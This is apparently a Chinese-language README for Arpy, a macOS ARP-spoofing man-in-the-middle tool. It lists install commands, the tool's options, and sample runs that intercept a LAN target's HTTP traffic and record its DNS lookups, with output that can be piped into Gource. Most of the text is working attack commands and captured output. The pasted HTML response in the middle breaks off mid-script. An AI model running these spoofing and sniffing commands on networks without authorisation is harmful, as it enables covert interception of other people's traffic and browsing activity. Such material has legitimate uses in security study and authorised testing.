
Arpy 是一款易于使用的 macOS ARP 欺骗中间人攻击(MiTM)工具。 它提供 3 个特定功能:
brew install gource
pip install scapy
$ git clone https://github.com/dugsong/libdnet.git
$ cd libdnet
$ ./configure && make && make install
cd python
python setup.py install
ivanvza:~/ > sudo arpy
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
用法: arpy -t <目标IP> -g <网关IP> -i <接口>
ARP 中间人攻击(MiTM)工具
选项:
-h, --help 显示此帮助信息并退出
-t 目标, --target=目标
目标IP
-g 网关, --gateway=网关
网关
-i 接口, --interface=接口
使用的接口
--tcp 仅过滤TCP流量
--udp 仅过滤UDP流量
-d 目的端口, --destination_port=目的端口
按目的端口过滤
-s 源端口, --source_port=源端口
按源端口过滤
--sniff 嗅探所有通过的数据
--sniff-dns 仅嗅探搜索过的域名
--sniff-dns-gource 以 Gource 格式输出目标的 DNS 查询
-v 详细输出 Scapy 数据包信息
此为数据包嗅探器,允许您查看目标的流量。
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
v3.15 -@viljoenivan
[信息] 正在启动嗅探器...
[信息] 启用 IP 转发...
[信息] 过滤器:((源主机 192.168.1.3 或 目的主机 192.168.1.3))
[信息] 发现以下内容(IP 层):192.168.1.3 -> 46.101.34.90
GET / HTTP/1.1
User-Agent: curl/7.37.1
Host: ivanvza.ninja
Accept: */*
[信息] 发现以下内容(IP 层):46.101.34.90 -> 192.168.1.3
HTTP/1.1 200 OK
Vary: Accept-Encoding
Content-Type: text/html
Accept-Ranges: bytes
ETag: "2719538271"
Last-Modified: Thu, 30 Apr 2015 08:25:15 GMT
Content-Length: 3213
Date: Fri, 29 May 2015 20:15:06 GMT
Server: Microsoft IIS
<html>
<title>><></title>
<body>
<pre style="line-height: 1.25; white-space: pre;">
\ SORRY /
\ /
\ This page does /
] not exist yet. [ ,'|
] [ / |
]___ ___[ ,' |
] ]\ /[ [ |: |
] ] \ / [ [ |: |
] ] ] [ [ [ |: |
] ] ]__ __[ [ [ |: |
] ] ] ]\ _ /[ [ [ [ |: |
] ] ] ] (#) [ [ [ [ :===='
] ] ]_].nHn.[_[ [ [
] ] ] HHHHH. [ [ [
] ] / `HH("N \ [ [
]__]/ HHH " \[__[
] NNN [
] N/" [
] N H [
/ N \
/ q, \
/ \
</pre>
<h3 id="list"><h3>
</body>
<script>
// NOTE: window.RTCPeerConnection is "not a constructor" in FF22/23
var RTCPeerConnection = /*window.RTCPeerConnection ||
此功能允许您查看目标正在请求的域名。
ivanvza:~/ > sudo arpy -t 192.168.1.4 -g 192.168.1.1 -i en0 --sniff-dns
_____
| _ |___ ___ _ _
| | _| . | | |
|__|__|_| | _|_ |
MiTM Tool |_| |___|
- @viljoenivan
[信息] 正在启动 DNS 嗅探器...
[信息] 启用 IP 转发...
[信息] 完成...
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: www.youtube.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: s2.googleusercontent.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: google.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: s.ytimg.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: fonts.gstatic.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: yt3.ggpht.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: i.ytimg.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: safebrowsing.google.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: safebrowsing-cache.google.com.
目标: 192.168.1.4 -> (192.168.1.1/DNS 服务器) 搜索了: safebrowsing-cache.google.com.
此功能与上述大致相同,但提供了将数据传递给 Gource 的能力,从而实时查看目标正在浏览的内容。
ivanvza:~/ > sudo arpy -t 192.168.1.3 -g 192.161.1.1 -i en0 --sniff-dns-gource
[信息] 如需实时 Gource 输出,请将此命令与以下命令并行运行:
tail -f /tmp/36847parsed_nmap | tee /dev/stderr | gource -log-format custom -a 1 --file-idle-time 0 -
[信息] 过滤器:((源主机 192.168.1.3 或 目的主机 192.168.1.3) 且 目的端口 53)

@viljoenivan